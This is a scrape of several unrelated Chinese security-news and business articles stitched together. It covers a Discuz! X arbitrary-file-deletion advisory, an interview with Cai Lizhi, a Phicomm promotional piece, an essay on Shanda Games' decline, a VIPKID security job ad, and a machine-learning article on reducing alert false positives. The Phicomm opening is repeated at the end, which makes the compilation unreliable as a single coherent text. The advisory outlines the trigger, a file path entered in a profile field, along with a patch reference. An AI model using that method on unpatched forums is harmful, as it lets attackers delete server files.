Discuz_logo.svg.png

Crossday Discuz! Board(简称 Discuz!)是北京康盛新创科技有限责任公司推出的一套通用的开源的社区论坛软件系统。采用 PHP 和 MySQL 构建的性能优异、功能全面的社区论坛平台。在个人资料设置处,利用特殊构造的请求会触发将个人资料字段的值参与文件删除操作,导致了任意文件删除漏洞的发生。早在2014年有白帽子向官方报告了一个类似的漏洞,但是由于没有修补全导致还有其他方式可以进行利用。

影响范围

Discuz! X3.3

Discuz! X3.2

Discuz! X3.1

Discuz! X2.5

漏洞介绍

在个人资料设置处,选择在情感状态下填入要删除的文件,执行删除操作。

2.png

缓解措施

根据参考连接里的commit编辑upload/source/include/spacecp/spacecp_profile.php文件,删除和unlink相关代码。

3.png

参考

https://gitee.com/ComsenzDiscuz/DiscuzX/commit/7d603a197c2717ef1d7e9ba654cf72aa42d3e574

恰逢上周是 2017 年度国家网络安全周,上海计算机软件开发中心与复旦大学合作建立的网络信息安全合作平台启动仪式之后,FreeBuf 有幸见到了上海计算机软件开发中心的蔡立志副主任,并开展了历时一个小时左右的访谈。 

蔡立志是全国信息安全等级保护高级测评师、2013年度上海市技术带头人、上海市第十届青联委员、上海市软件行业标兵、上海市闵行区领军人才、中国评测机构联盟技术委员会主任。他同时担任着 CCF软件工程委员会委员、华东理工大学兼职硕士生导师、全国信息技术标准化委员会人机交互专业委员会委员、全国信息技术标准化委员会SOA分技术委员会委员、ISO/IEC JTC1/SC7 China Delegate 等职务。他同时还是“英汉信息技术系列辞书”编委会委员以及《英汉信息安全技术辞典》副主编。

我所见到的蔡主任,身着整洁而朴实的浅色衬衫、黑色裤子,坐在展位的圆桌前,眼里存着温和的笑意,也闪烁着历经岁月沉淀下的智慧,回忆过去的一些趣事时也不时露出温暖的笑容。

这样的感觉,让我觉得他看上去并非像一个领导,而更像一个温和儒雅的大学教授,是的,实际上,他也担任着上海多所高校(上大、华理)的兼职教授工作。

israbye FreeBuf.COM

网络安全周上海计算机软件开发中心展台

从用 Basic 语言编写日历程序到 Top20 的 IBM 全球挑战赛得主

在 1980 年时,计算机还是稀有的产物,还是高中生时的他,第一次见到Apple电脑。彼时的计算机编程环境还是使用 Basic 语言,需要在终端上进行编程。

没有图形化的界面,没有控件,没有组件,从零开始,每一行代码都需要自己编写。他从日历程序开始写起,踏入这个计算机的世界。也许就是自那时起,计算机世界的奥妙就吸引了他,并与他的一生结下了缘分。

israbye FreeBuf.COM

高中时使用 Basic 语言编写日历程序

本科主修专业是物理系的他,在辅修计算机课程时学会了使用 Pascal 语言。初次踏入工作单位后,他开始帮助财务使用 FoxBase 进行数据库管理和财务软件的编写。紧接着,他干脆花费了工作几年来的全部积蓄——用 7000 元买了一台自己的计算机,正正经经地去念了计算机的研究生。研究生期间时,他去参加了 IBM Linux 全球挑战赛和柯达图像处理软件竞赛。在 IBM Linux 全球挑战赛中,他一举从全球 6000 名参赛者中脱颖而出,以 “高性能计算” 的算法方案成为当年中国唯一获奖的 Linux 挑战赛项目,入选全球前 20 名的好成绩。

israbye FreeBuf.COM

参加 IBM 挑战赛时入选全球 TOP 20

IBM 评奖委员会也许也是对当时这个年轻学生所递交的方案非常满意,奖励给他一台在当时的价值就达 25000 元的高性能计算机。

软件质量及安全需求与时俱进

国际上在 1970 年开始出现软件工程危机,由于中国与国际发展时间差的存在,中国大约是在 80 年代也开始遇到这样的软件工程危机,计算机软件的质量和其中存在的安全隐患逐渐显现。

随着计算机软件的复杂度不断提升,保证软件的质量和安全已经不再是通过简单的人工阅读代码、手工的检查的方式实现的了,而是需要通过专门的软件工程方法学来对越来越复杂的计算机软件进行测试和判断。

于是,上海计算机软件开发中心应运而生,在国家科委及上海市科委之下成立,开始负责计算机软件的质量和安全的检测。而目前的蔡主任依旧在负责软件工程质量、安全标准研制工作,在软件工程领域,甚至约占  1/3 的标准均是由蔡主任负责或者参与研制的。

israbye FreeBuf.COM

软件质量与安全需求不断发展

在访谈中,我们还了解到随着时代的发展,信息安全在软件工程质量的重要性进一步显现,如今已经几乎成为了并列的分支。蔡主任所领导建立的上海计算机软件开发中心目前也开始做软件测试、咨询、监理等内容。

历经 33 年的发展之后,企业已经从“要我测”这种合规意识转变成“我要测”的主动需求,提升了对于系统质量和安全性的重视的同时,也可以将更多的关注投放在研发之上,将软件质量测试的工作交给专业的评测服务机构来完成。

对于初创企业而言,同规划、同建设、同使用的评测和质量保障措施以及上海计算机软件开发中心所沉淀下的知识库、用例库和缺陷库的数据够提供给这些企业以专业的服务和及时的安全建设建议。上海计算机软件技术开发中心,由于其在安全测评领域的出色成绩,连续两年被评为全国优秀等级保护测评单位。刚刚获得消息,在 2017 年网络安全用户大会上,又获得了上海市信息安全优秀服务案例评选优秀示范奖。

要做正确的事情,技术慢慢提升也不要紧

在访谈的后半环节,我们谈到了信息安全发展的趋势和未来,蔡主任表示现在的信息安全是立体的复杂的全方位的问题,任何一家企业都无法单打独斗称为行业的霸主。所以,整个安全行业的健康发展需要来自企业、事业单位、学界的多方面的合作。

israbye FreeBuf.COM

上海软件中心与复旦大学等高校展开合作

在两年前,其实我们的安全态势还是不容乐观的,但如今在国家的大力倡导下,企业的安全意识已经得到了提升,与此同时,政府的监管也提高了,现在的安全态势已经不可同日而语。

当然我认为问题还是存在的,数据隐私的使用还没有明确的界限规定,刚开始时图落实政策的企业还会遇到很多难题。所以这些问题可能还是需要一些时间来完善。

看来,信息安全未来发展,还是需要更多从业人员的努力,而最后当谈到人才教育的内容时,蔡主任也表示目前行业对高校信息安全专业的学生还是有较高的要求的,难度也很大。安全人才还是需要学习很广的范围,他们不仅需要掌握数据库、编程语言,还有对操作系统、中间件有足够的深入理解。

社会对于对安全的认知程度也还是偏向于边缘化,这样就导致这方面人才还是挺稀缺的.

最后我们还询问了蔡主任对年轻的信息安全爱好者和白帽子们的寄语。

他颇有一丝严肃地表示,

做信息安全这个行业的年轻人,都已经有很好的兴趣和能力来找到一些漏洞和安全隐患。但最重要的一点,其实是对于自己所获取信息的合理利用,一定不能随意地在网上发布和披露,也不能利用这些信息进行交易和获利。

所以希望大家一定要以合适的方式进行交流和研究,否则就是影响个人一辈子的声誉。技术上的学习和提升,其实大不了就是慢慢提升,但是年轻人的方向千万要注意,不能走错道路了。

*本文作者 Elaine ,转载请注明 FreeBuf.COM

1.jpg

9月27日-30日,亚洲规模最大、最具影响力的信息通信盛会“2017年中国国际信息通信展”在京召开。作为中国乃至全球“ICT市场的创新基地和风向标”,未来网络、大云计算、万物互联、创享生活、智慧世界、安全社会六大主线成为了展会焦点,而这六条主线最终又集中通往了一个命题——普惠科技。普惠科技正在承担着与普惠金融一样的责任,构建以人为核心的智慧生活圈。

智能时代,群雄并起争天下

每一个时代都有一些企业去身体力行的扛起时代赋予的重任。互联网时代,百度、阿里等互联网巨头振兴互联网行业;共享经济时代,摩拜、ofo扛起了共享单车的大旗。随着人工智能技术的迅猛发展,全社会开始迈向智能时代,哪些企业又将扛起这个时代的重任?

一方面随着生活水平的不断提高,人们不断地对居住环境提出更高的要求,越来越注重生活中每个成员的舒适、安全与便利,并且对人、家庭以及住宅小区的各个方面提出了更高的要求。

另一方面,在人工智能技术飞速发展的背景下,各种产品嵌入AI 技术衍生出智能硬件产品,智能领域进入“万物皆载体”的新阶段。在智能时代,企业的重任是:从家居环境的本性出发,用高科技智能化手段实现家居的安全、舒适、方便,让人们过上真正的智慧生活。

近几年,不论互联网科技公司小米、百度,或者是传统家居企业美的、海尔等,又或者是以斐讯为代表的创新型科技企业,都选择在这个时代扛起用科技改变生活的重任。据前瞻产业研究院《中国智能家居设备行业市场前瞻与投资报告》指出,中国智能家居市场规模在2016年明显增长,到2018年市场规模将达到1800亿元人民币,智能家居也在这几年内迎来全面爆发。

在科技企业中,小米是智能家居领域跑得最快的企业。从2013年至今,小米已经形成了通过手机或音箱进行控制的一体化智能家居系统。做手机起家的小米先是运用人工智能技术牢牢把握住了智能家居的主要入口,然后相继推出了电视、盒子、扫地机器人、电饭煲、空气净化器等智能商品,接着将所有智能设备的价格降到了普通家庭完全可以接受的水平,从而吸引了广大“米粉”的购买。但是它的产品线不如传统家电厂商全,市场占有率不足。

海尔是全球领先的家电厂商,也是传统家电厂商开拓智能家居的领军企业。其通过U+智慧生活开放平台切入,推出了以空气盒子为代表的“U+健康空气全套解决方案”;以智能冰箱为中心的“U+膳食综合解决方案”等智能家居服务,凭借丰富的产品矩阵,在智能家居市场具有很高的市场占有率和显著的品牌效应。但是海尔的智能家居还是偏传统领域,相较于科技企业,海尔在人工智能方面的积累不足,在智能家电的入口设备上没有强有力的竞争产品。

在今年中国国际信息通信展中,秉承着智能硬件免费、互联网运营和大数据云服务理念的创新型科技公司斐讯,其“金三角战略”指导下三大业务模块,Smart Home(智慧家庭)、Smart Data(智慧大数据)、Smart Life(智慧生活)成为了此次展会的亮点。斐讯发展至此已经形成了以K系列家族路由器为入口,多种智能家居产品为基础且相互关联的智能家居生活。此前,斐迅已经连续六次参加中国国际通信展,每次参展智能产品都能让人眼前一亮,而今年的智能产品更是集新颖的模式、实用的智能硬件、超智能的AI技术、大数据应用于一身,已然形成了一个完整的智慧生活圈。

智能家居企业的发展方向一直是:为全民打造一个安全,快捷,舒适的智能生活环境。然而,有数据显示,全球智能家居渗透率当属美国最高,但美国市场渗透率仅仅只达5.8%,同期中国智能家居市场渗透率也仅为0.1%,可见市场上智能家居设备的市场渗透率并不高。智能家居领域出现了一个僵局:智能家居在人工智能领域红了半边天,在民众中普及率却非常低。

由此,“如何让科技改变生活落到实处,让全民过上智慧生活?”成为智能家居企业新的议题。

一场由斐讯率先发动的“普惠科技”革命兴起

智能家居进入国内市场以来,一直以高大上的形象出现在人们的视野中。因此,当人们一听到智能家居,首先想到的就是我们在电视里面看到过的富豪豪宅里才有的东西,给我们的第一印象就是:这东西很好但很贵,用不起。

自从物联网、云计算等先进科技的应用步入正轨之后,智能产品的实用性成为智能家居企业的重点。智能产品越来越贴近生活、接地气,各大智能家居公司还为了抢占市场打起了价格战。但是仍然有很多人认为智能家居不是一个理想的消费品,真正让其花钱去体验的话还是会有疑虑。在智能家居产品久久不能落地的时候,倡导智慧家庭、智慧生活的创新型科技企业斐讯率先喊出了“普惠科技”的口号。

那么,在万物互联飞速发展的大背景下,各路新技术层出不穷,“普惠科技”到底如何实现给大众提供实惠生活?

作为“普惠科技”理念先行者的斐讯在北京国际信息通讯展上展出其Smart Home(智慧家庭)+Smart Data(智慧大数据)+Smart Life(智慧生活)三大战略“金三角战略”,为“普惠科技”做出了引领。

首先,“普惠科技”的前提是拥有健全的科技产品。斐讯推出的Smart Home版块包含了家庭网络、智能硬件及家庭自动化三大产品线的智能产品。例如:斐讯的明星产品K系列家族路由器、智能体脂秤S7、智能手环、手表等。除此之外,近日在2017年中国国际信息通信展首次亮相的斐讯空气检测仪悟空、空气净化器悟净、净水器泉+以及智能插排等产品也十分引人注目。

其次,真正的智慧生活不是智能硬件单品的堆积,而是一个整体的、相互关联的智能系统。所以需要通过优化及打通上下游环节,提升产品智慧化程度以及品牌服务能力。因此,对于“普惠科技”的践行,必须有一个精确的数据服务模式。在服务方面,斐讯Smart Home、Smart Data、Smart Life的“金三角战略”一方面以智能硬件产品为基础;另一方面,利用大数据打通终端和个人的闭环,从而为消费者提供精确服务,最终实现智慧生活。

最后,“普惠科技”最重要的一个环节是要做到普惠。而“普惠科技”一是要“普”:扩大消费者人群;二是要“惠”:降低智能产品价格。为此,斐讯先是做大消费人群进而打造全民智慧生活圈;然后通过增加产品覆盖范围的方式增强企业自身价值,从而有能力降低智能产品成本,使消费者获得最大收益。

事实上,在普惠科技给消费者带来实惠的同时,良好的市场反响也会促进企业的发展。而以健全的科技产品以及高质量的科技服务为基础,以为用户带去真正的智慧生活为目标,在斐迅的带领下智慧生活对于消费者已经不再只是一个遥远的概念。

“普惠科技”将推动全民智慧生活大步向前迈进

提起“普惠科技”,人们必然会关联起近几年的热门话题“普惠金融”。“普惠金融”是新金融发展的重要方向之一,其主要目的是能有效、全方位地为社会所有阶层和群体提供服务的金融体系。

根据央行数据显示,2016年1~6月,银行业金融机构涉农贷款余额27.3万亿元,同比增长8.7%;非银行支付机构处理网络支付业务671.14亿笔,金额41.93万亿元。随着国家对普惠金融的提倡,过去被排斥于金融服务之外的大规模客户群体也有所获益。

“促进普惠金融体系,全面建设小康社会”与“促进普惠科技体系,全面建设智慧生活”大体相同。斐讯所主张的“普惠科技”实质,就是希望像普惠金融一样让科技服务能够更快、更多、更好地在社会各阶层和群体中得到普及。

从智能科技企业角度来看,在物联网迅速发展、智能硬件越来越便宜的情况下,智能科技企业想要获取盈利越来越难,并且在众多的企业中打响自己的品牌同样困难。而“普惠科技”不仅能扩大消费群体,薄利多销,还能帮助智能产品树立更好的品牌形象。

从消费群体角度来看,互联网的快速发展使得智能家居加快进入小部分消费者的生活,而广大的90后消费群体也在渴望着更舒适、更方便、更安全和更健康的智慧生活,但智能产品高昂的价格让很多消费者望而却步,而普惠科技的推广正是让消费者实现智慧生活的最佳方式。

“普惠科技”和“普惠金融”一样是大势所趋。众所周知,任何产业的发展,都离不开金融的支持。而人工智能从诞生以来,理论和技术日益成熟,应用领域也不断扩大,可以设想人工智能带来的科技产品必将覆盖我们各个生活领域,未来任何产业的发展也都离不开人工智能的支持。

整体而言,人工智能的发展促进了智慧生活的到来,但智慧生活不是简单地通过免费智能硬件提高用户覆盖率就能轻易打造的,还需优化及打通上下游环节、整合各产业供应链从而打造出完善的智慧生活圈。而毋庸置疑的是,正如“普惠金融”加速了金融行业的发展一样,在以斐讯为代表的“普惠科技”践行者带领下,普惠科技将全面推动全民智慧生活大步向前。

刘旷,以禅道参悟互联网、微信公众号:liukuang110

1.jpg

一提到盛大,人们最先想到的毫无疑问是盛大游戏。这个国内网游界的“开山鼻祖”自出现伊始就一直是行业领跑者,直到2009年才被腾讯超越。昔日还是占盛大集团营收近八成的主业,今天却已被全盘出售,从风光无限的游戏巨头到身陷IP续约官司、股权纠纷及商标问题泥潭的多事企业,盛大游戏这些年到底经历了什么?

当年大名鼎鼎的盛大游戏现在怎么样了?

今天可能有的人不知道盛大游戏,但一定听说过《热血传奇》这个游戏。在互联网方兴未艾之际,盛大游戏的赫赫大名无人不知。在当时,盛大游戏风头正盛,其在游戏行业的霸主地位无人能撼,就连畅游仅仅一个季度的游戏营收超过盛大都要大张旗鼓地宣告天下,以此为傲。

但好景不长,2009年,腾讯靠着《LOL》、《DNF》、《CF》三款游戏带来的营收成功超过盛大游戏一跃成为网游行业的第一巨头。2010年,网易凭借着《魔兽世界》、《大唐无双》等游戏也成功赶超盛大游戏。自此,游戏行业两大巨头地位不再曾动摇过,甚至出现了“腾讯第一,网易第二,再无第三”之说,盛大游戏已不复当初。

2014年,盛大游戏宣布开始从美国退市实行私有化,引来各方资本争抢,财团之间的股权大战一时间闹得沸沸扬扬。受此影响,盛大游戏的营收在这两年内大幅降低,大股东世纪华通的数据显示,盛大游戏2016年年营收38.6亿元,相比2013年下降11.26%。而在盛大游戏忙于内斗无暇运营游戏业务的这段时间里,国内整个游戏市场的销售收入从831.7亿元猛增到1655.7亿元,涨幅翻了一番,盛大的损失不言而喻,原本就落后的盛大雪上加霜。

2016年,盛大集团宣布已出售盛大游戏所有股份,二者再无关系,同时,盛大游戏的商标将于年底到期。消息一出,人们嘘唏不已。这意味着盛大游戏从此不再属于盛大集团,同年的Chinajoy将成为盛大游戏参与的最后一年。在展会结束当天,伴随着《See you again》音乐的响起,大屏幕上也打出了这几个硕大的单词,前来参展的盛大玩家纷纷泪目。虽然今年商标成功续约两年,但未来盛大游戏是否会更名,依然是个不定数。

今年8月28日,世纪华通发布公告称对盛大游戏实现完全控股,宣告了这场历时两年的私有化资本斗争大戏终于尘埃落定,世纪华通真正成为了盛大游戏的新东家。

从曾经国内网游玩家无人不识的游戏大佬到光环褪去东家易主的老三,盛大游戏这个最先在游戏行业安身立命的领头羊,在日新月异的互联网时代中,最终还是失去了它的主导地位。

从名不见经传到业内传奇,盛大游戏做了什么?

用“出道即巅峰”来形容盛大游戏一点都不为过,与其他先做互联网再做游戏的企业不同,盛大游戏是真正靠游戏发家的。

1999年,盛大游戏成立。两年后,盛大游戏在各方不看好的情况下毅然决然地拿下了《热血传奇》的代理,这个孤注一掷的正确决定后来使盛大游戏一举成名。在网游行业尚在起步阶段的当时,这款新颖的MMORPG游戏迅速风靡全国,堪称国内网游的“开山之作”,时至今日依然在给盛大游戏带来盈利,其影响力可见一斑。

2003年,因与韩国方面的游戏版权问题产生纠纷,盛大游戏开始自主研发网游,推出了《传奇世界》。在前面打响了名气之后,《传奇世界》的发行顺理成章地大获全胜。随后《泡泡堂》、《龙之谷》、《永恒之塔》等游戏的成功更是奠定了盛大游戏在国内游戏行业第一巨头的地位,由此开始了盛大的一系列广泛投机。

2005年,盛大游戏开启了网游行业的新篇章。从原来的时长收费改为游戏免费增值服务收费模式,一时间各大游戏企业侧目,视之为“疯了”,其业绩也在之后几个季度的财报中呈现下滑。但没过多久,市场就再次证明了这一决策的远见。

在盛大实行这一模式后的2009年,国内网游用户从1000万猛增到两亿多,网游行业营收从20多亿涨至300亿,自此,这一模式正式成为游戏行业的标准盈利方式。同年,靠着《传奇世界》等游戏带来的巨额资本,盛大游戏成功在纳斯达克上市,并创下了中国企业在美国单地上市的最大融资规模纪录。

2001年,在众多互联网企业尚在摸索发展道路的时候,盛大游戏仅凭借着《热血传奇》这一个游戏就已经名声大噪。1999年成立,2009年上市,从一个租房创业的小公司到中国最赚钱的互联网游戏企业,盛大游戏用十年的时间达成了这一成就。

盛大游戏是如何一步步走向了没落?

2017上半年各大游戏公司的财报显示,腾讯以总体收入466亿元的高额营收位列第一,紧随其后的是总收入达201.65亿元的网易,而盛大游戏上半年主营业务收入16.33亿元,净利润为6.18亿元。其主营业务收入连昆仑万维和游族网络都比不上,更是无法与腾讯、网易相提并论。最初在游戏行业占据绝对主导权的盛大游戏走到今天这一步,无疑是众多原因造成的。

首先是重投机,一味追求短时间内的价值呈现。盛大游戏靠着《热血传奇》发家以后,就开始着手布局更多游戏发行,以求能再次通过广撒网的投机打造更多一举成名的游戏。2008年至2015年期间,盛大先后上线了《巨星》、《星辰变》、《零世界》、《X乒乓》、《时空裂痕》等,但这些游戏都因为短时间内没有看到盈利、无法再现《热血传奇》之势,而立即被盛大无情抛弃。在这段时间内,大量优质游戏在盛大游戏手上不是变得平平无奇,就是落得关服停运的下场。

其次是轻运营,大肆圈钱罔顾玩家游戏体验。说到盛大游戏,最让人惋惜的莫过于《冒险岛》和《龙之谷》这两款游戏。其在上线伊始就收获了一众玩家的赞誉,但随着官方对于外挂滥用、私服横行现象的不作为,加之以频繁更新回到零起点等各种方式迫使玩家进行重复消费,最终导致它们走向了衰落,同期没落的相似游戏还有很多。这种只求利益、不重游戏的做法最终造成盛大用户的大量流失。

再次是错失手游入局先机,想要竞争却为时已晚。随着智能手机的普及、移动网络的大范围覆盖及人们碎片化时间的增多,手游渐渐成为行业新宠。在这种背景下,各大游戏企业纷纷入局,而作为行业先导的盛大游戏却错失了先机。腾讯、网易等巨头的手游就不必说了,就连金山都能推出《暖暖环游世界》,巨人网络上线的《球球大作战》也曾火爆一时,相比之下,盛大游戏最有名的就是代理手游《扩散性百万亚瑟王》,但却因种种原因很快就停服了。如今,手游收入早已超越了端游,在优质手游层出不穷的当下,盛大游戏想要坐拥一席之地为时已晚。

最后,决策者超前意识的背后没有坚持做游戏的初衷。盛大创始人陈天桥在靠着盛大游戏赚得盆满钵满之后,立刻集火转向投资其他产业,志不在此的他并没有一直专注游戏领域,《巨星》游戏就是最好的验证实例。这个国内大型在线K歌网游于2012年正式关服,然而就在短短几年之后,唱吧、天天K歌、全民K歌等迅速风靡全国,当初若是盛大坚持做下去,现在又会是怎样的光景?

盛大先后通过收购、合并等方式进军视频、文学、支付平台、游戏平台等领域,但最终皆以失败告终。如今盛行的支付宝、小米盒子、微信、腾讯文学等领域,盛大都曾染指:盛支付、盛大易宝、Talkbox、盛大文学……当时的盛大可以称得上是“吃螃蟹的第一人”。遗憾的是,盛大的决策者有超前的意识,却没有赶上真正的好时机。所谓时势造英雄,盛大不仅没有在别的行业闯出一番天地,就连赖以生存的游戏高地也没能守住。

时至今日,盛大游戏风光不再已是不争的事实。无论是盛大玩家,还是其他用户,看着这个曾经的国内互联网游戏巨人正一点一点矮下去,正如美人迟暮,英雄陌路,让人不胜唏嘘。

盛大游戏作为最先在游戏行业站起来的先导者,多年以来一直遥遥领先其他对手。但随着时代的变迁,这个有着传奇经历的游戏巨头逐渐被拉下神坛,在这场优胜劣汰的角逐中慢慢被超越,从曾经的稳坐业内第一把交椅到排行第三,盛大游戏辉煌不再。脱离了盛大集团的盛大游戏未来将去向何方,可能也不会再有人关心了。

刘旷,以禅道参悟互联网、微信公众号:liukuang110

公司简介:

VIPKID 是由创新工场、经纬中国、红杉资本、北极光、真格基金、云锋基金以及由科比创立的Bryant Stibel基金等投资机构联合投资的互联网教育公司,专注为4-12 岁左右的小朋友提供有效、生动的在线英语学习体验。我们拥有优质的北美小学教师资源,孩子通过1对1在线视频互动平台,在家就可以同北美老师连线。VIPKID的教材均为基于美国共同核心州立标准(CCSS)而独立研发的适合中国孩子的教材。

VIPKID的外教均来自于美国和加拿大,熟悉北美文化,拥有国际视野,外教们大多拥有美国优质高校的学历背景,拥有丰富的少儿英语教学经验。VIPKID对外教有严格的招聘及考核标准,录取率低于10%。

在 VIPKID,我们希望小朋友不仅可以学会说一口流利的英语,还可以接触国际前沿的教育内容,培养孩子的创造力、表达力,以及独立思考的能力。

VIPKID目前拥有学员超过80万名,在册北美外教超过20000名,我们的愿景是:帮孩子插上语言的翅膀,自由行走于这个星球。

安全团队简介:

VIPKID安全部致力于公司整体安全体系的建设与持续运营,为公司业务快速发展提供强有利、可靠的安全保障。

公司地址:北京市东城区豆腐池胡同23号(鼓楼大街附近)

薪资范围:15K-35K(视个人能力而定,能力突出者不受此限制)

简历投递邮箱:[email protected]

数据安全工程师(高级、专家)

所属部门:

安全部-业务安全组

岗位职责:

1. 基于公司具体业务场景,分析、评估公司面临的数据安全风险和安全现状,并提供可落地的数据安全解决方案

2. 主导VIPKID整体数据安全体系的建设与持续运营

3. 负责数据安全体系的技术方向、实现思路、产品架构、功能设计

4. 与公司内其他部门合作,推动完成数据安全体系建设和落地

5. 数据安全事件应急响应

6. 对相关人员进行数据安全培训,提升公司整体数据安全水平

任职要求:

1. 对数据安全有浓厚的兴趣,有大型互联网公司成熟数据安全体系建设经验者优先

2. 扎实的计算机编程基础,有C/C++、Java 项目编程经验

3. 有深厚的数据安全架构、产品设计能力;主导过较大规模或较复杂的数据处理工作

4. 精通数据仓库、数据挖掘以及大数据技术的技术体系;有过大型数据处理平台系统架构设计经验或实施经验者优先

业务安全工程师(高级、专家) 

所属部门:

安全部-业务安全组

岗位职责:

1. 负责公司内、部外产品的业务安全风险评估并提供可落地的安全解决方案

2. 主导公司业务安全体系和风控系统的建设和持续运营

3. 与公司内其他部门合作,推动完成业务安全体系建设和落地

4. 业务安全事件应急响应

5. 对相关人员进行业务安全培训,提升公司整体业务安全水平和安全意识

任职要求:

1. 对业务安全有浓厚的兴趣,有大型互联网公司成熟业务安全、风控体系建设经验者优先

2. 有较强的数据分析能力和逻辑思维能力

3. 具备良好责任心,沟通协调他文档编写能力等

安全运营工程师 

所属部门:

安全部-安全应急响应中心

岗位职责:

1、负责打造VIPKID SRC对外影响力和美誉度;

2、提升白帽子数量和粘性,提升平台漏洞投入产出比;

3、负责SRC相关的各项安全策略的制定、编写、推动、运营和产品化;

4、负责组织安全相关线上和线下活动。

任职要求:

1、3年以上工作经验,熟悉漏洞管理等安全运营工作,对主流安全漏洞有基本的认知

2、具备独立策划和落实线上和线下活动的能力,有一定的创造力

3、熟悉安全业界的常见的媒体、平台、厂商等相关渠道及推广手段

4、良好的沟通表达能力、文字功底及情绪管理能力

5、在安全业界有一定影响力者优先

无论是基于规则匹配的策略,还是基于复杂的安全分析模型,安全设备产生的告警都存在大量误报,这是一个相当普遍的问题。其中一个重要的原因是每个客户的应用场景和数据都多多少少有不同的差异,基于固定判断规则对有统计涨落的数据进行僵化的判断,很容易出现误判。

在没有持续人工干预和手动优化的情况下,策略和模型的误报率不会随着数据的积累而有所改进。也就是说安全分析人员通过对告警打标签的方式,可以将专业经验传授给智能算法,自动得反馈到策略和模型当中,使之对安全事件做出更精准的判断。本文介绍利用专家经验持续优化机器学习的方法,对告警数据进行二次分析和学习,从而显著地降低安全威胁告警的误报率。

为了降低误报率,当前大体上有两种技术途径:

根据不同客户的各种特定情况修正策略和模型,提高策略或者模型的适应能力;

定期(如每月一次)对告警进入二次人工分析,根据分析结果来调整策略和模型的参数配置。

这两种方法对降低误报率都有一定的作用。但是第一种没有自适应能力,是否有效果要看实际情况。第二种效果会好一些,但是非常耗时耗力,而且由于是人工现场干预和调整策略和模型,出错的概率也非常高。

MIT的研究人员[1] 介绍了一种将安全分析人员标记后的告警日志作为训练数据集,令机器学习算法学习专家经验,使分析算法持续得到优化,实现自动识别误报告警,降低误报率的方法(以下简称标签传递经验方法)。这种把安全分析人员的专业智能转化成算法分析能力的过程,会让分析算法随着数据的积累而更加精确。继而逐渐摆脱人工干预,提高运维效率。如下图所示:

基于标记数据学习降低误报率的算法优化

下面我们通过基于“频繁访问安全威胁告警”模拟的场景数据来介绍一下实现机制。

什么是频繁访问模型?逻辑比较简单:一段时间内(比如1分钟),一个攻击者对系统的访问次数显著高于普通访问者的次数。此告警规则可以用简单的基于阈值,或者是利用统计分布的离异概率。基于此,我们先模拟一些已经被安全分析人员打过标签的告警数据。根据实际应用经验,我们尽量模拟非常接近实际场景的数据。如下图:

基于标记数据学习降低误报率的算法优化

关于模拟数据的介绍:

总共模拟了20天的告警数据,从2017-01-01到2017-01-20。前10天的数据用来训练模型,后10天的数据用来衡量模型的表现;

每个告警带有是否误报的标签。红色代表误报,蓝色代表准确告警。 

关于模拟数据的假设:

误报聚集在某个时间段,模拟数据假设的范围是18:00-19:00。在安全运维实践中,的确存在某个特定的时间段,由于业务逻辑或者系统原因导致误报增多的现象。所以上述假设是合理的,告警时间可以作为有效的特征值。但并不是所有的误报都聚集在这个时间段,同时并不是这个时间段的所有告警都是误报;

误报大多来自于一批不同的IP。所以访问来源IP也是有用的特征值;

任何数据都不是完美的,所以在模拟数据中加入了~9%的噪音。也就是说再完美的智能模型,误报率也不会低于9%。

这些假设在实际的应用场景中也是相对合理的。如果误报是完全随机产生的,那么再智能的模型也不能够捕捉到误报的提出信号。所以这些合理的假设帮助我们模拟真实的数据,并且验证我们的机器学习模型。

简要模拟数据的代码实现:

基于标记数据学习降低误报率的算法优化

下图显示利用PCA降维分析的可视化结果,可以看到明显的分类情况:

基于标记数据学习降低误报率的算法优化

红色代表误报,蓝色代表正确告警。基于设定特征值的降维分析可以得到两个聚集,即误报和非误报有明显的区分的,也就是说误报的是有一定规律,不是完全随机的,因此是可以被机器学习捕捉到的。

简要代码实现:

基于标记数据学习降低误报率的算法优化

基于模拟数据,我们想要达到的目的是通过持续的强化机器学习能够降低误报率。所以我们采取的策略是:

训练一天的数据2017-01-01,测试10天的数据2017-01-11到2017-01-20;

训练两天的数据2017-01-01到2017-01-02,测试10天的数据2017-01-11到2017-01-20;

以此类推,来看通过学习越来越多的数据,在测试数据中的误报率是否能够得到不断的改进。

简要代码如下:

基于标记数据学习降低误报率的算法优化

此安全威胁场景相对简单,我们不需要太多的特征值和海量的数据,所以机器学习模型选择了随机森林(RandomForest),我们也尝试了其他复杂模型,得出的效果区别不大。测试结果如下:

基于标记数据学习降低误报率的算法优化

达到我们所预期的效果,当训练数据越来越多的时候,测试数据当中的误报率从20%多降低到了10%。通过对告警数据和标签的不断自学习,可以剔除很多告警误报。前面提到,数据当中引入了9%的噪音,所以误报率不会再持续的降低。

在我们的机器学习模型当中,我们利用了4个主要的特征值:

srcIP,访问源IP

timeofday,告警产生的时间

visits,访问次数

destIP,被访问IP

下图显示了特征值在模型中的重要性:

基于标记数据学习降低误报率的算法优化

和我们的预期也是一致的,访问源IP(srcIP)和告警发生的时间(timeofday)是区分出误报告警效果最好的特征值。

另外,由于随机森林模型以及大部分机器学习模型都不支持分类变量(categoricalvariable)的学习,所以我们把srcIPdestIP这两个特征值做了二值化处理。简要代码如下:

基于标记数据学习降低误报率的算法优化

总结

本文通过一组模拟实验数据和随机森林算法,从理论上验证了“标签传递经验方法”的有效性。即通过安全分析专家对告警日志进行有效或误报的标记,把专家的知识技能转化成机器学习模型的分析能力。和其他方法相比,此方法在完成自动化学习之后就不再需要人工干预,而且会随着数据的积累对误报的剔除会更加精确。

具体细节请参考我们的github源代码:https://github.com/ailpha/ml-reduce-false-alerts

参考文献:

[1]   Kalyan Veeramachaneni,Ignacio Arnaldo , “AI2 : Training a big data machine to defend”

*本文作者:安恒AiLPHA大数据,转载请注明来自 FreeBuf.COM

1.jpg

9月27日-30日,亚洲规模最大、最具影响力的信息通信盛会“2017年中国国际信息通信展”在京召开。作为中国乃至全球“ICT市场的创新基地和风向标”,未来网络、大云计算、万物互联、创享生活、智慧世界、安全社会六大主线成为了展会焦点,而这六条主线最终又集中通往了一个命题——普惠科技。普惠科技正在承担着与普惠金融一样的责任,构建以人为核心的智慧生活圈。

智能时代,群雄并起争天下

每一个时代都有一些企业去身体力行的扛起时代赋予的重任。互联网时代,百度、阿里等互联网巨头振兴互联网行业;共享经济时代,摩拜、ofo扛起了共享单车的大旗。随着人工智能技术的迅猛发展,全社会开始迈向智能时代,哪些企业又将扛起这个时代的重任?

